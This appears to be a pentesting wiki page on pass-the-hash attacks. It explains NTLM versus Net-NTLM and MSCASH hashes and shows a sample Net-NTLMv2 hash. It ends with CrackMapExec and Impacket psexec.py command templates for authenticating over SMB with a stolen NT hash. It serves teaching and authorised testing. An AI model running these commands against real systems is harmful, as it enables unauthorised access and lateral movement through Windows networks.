# Pass the hash

Before we talk about this attack, let's clarify a few things, namely NTLM vs. NTLMv1/v2 vs. Net-NTLMv1/v2 vs. MSCASHv1/v2, because there is a lot of phrasing out there and it can get confusing for people who are not used to handling these.

{% hint style="warning" %}
**NTLM ≠ ( NTLMv1/v2 === Net-NTLMv1/v2 )≠ MSCASHv1/v2**
{% endhint %}

In short:

* **NTLM** (aka NT) hashes are **local user hashes**
* **NTLMv1/v2** (aka Net-NTLMv1/v2) hashes are **used for network authentication**
* **MSCASHv1/v2** (aka DCCv1/v2) hashes are **cached domain user hashes**

NTLM hashes are stored in the Security Account Manager (SAM) database and in the Domain Controller's NTDS.dit database. They look like this:

![](https://782540430-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LzBjY2lU8TBX2McCswT%2F-M1A7OgCHkgVaqmz_kr1%2F-M1A9m-eu1CP-EmOlc66%2Fimage.png?alt=media\&token=bb48858e-0342-4411-9104-137e7e6b993b)

Contrary to what you'd expect, the LM hash is the one *before* the colon and the NT hash is the one *after* the colon. Starting with Windows Vista and Windows Server 2008, by default, only the NT hash is stored.

Net-NTLM hashes, on the other hand, are used for network authentication: they are the result of a challenge/response algorithm keyed with the user's NT hash, so a capture is tied to one challenge and is not the stored credential itself. Here's an example of a Net-NTLMv2 (a.k.a. NTLMv2) hash:

```
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
```

From a pentesting perspective:

* You **CAN** perform Pass-The-Hash attacks with **NTLM** hashes.
* You **CANNOT** perform Pass-The-Hash attacks with **Net-NTLM** hashes.

Now on to the attack. To pass the hash you can use CrackMapExec, giving it only the NT part of the hash:

```
crackmapexec smb <ip_range>/<CIDR> -u <user> -H <NT hash> --local-auth
```

Obviously you can use other tools too, such as Impacket's psexec.py, which takes the whole `LM:NT` pair:

```
psexec.py <user>@<ip_addr> -hashes <LM hash>:<NT hash>
```
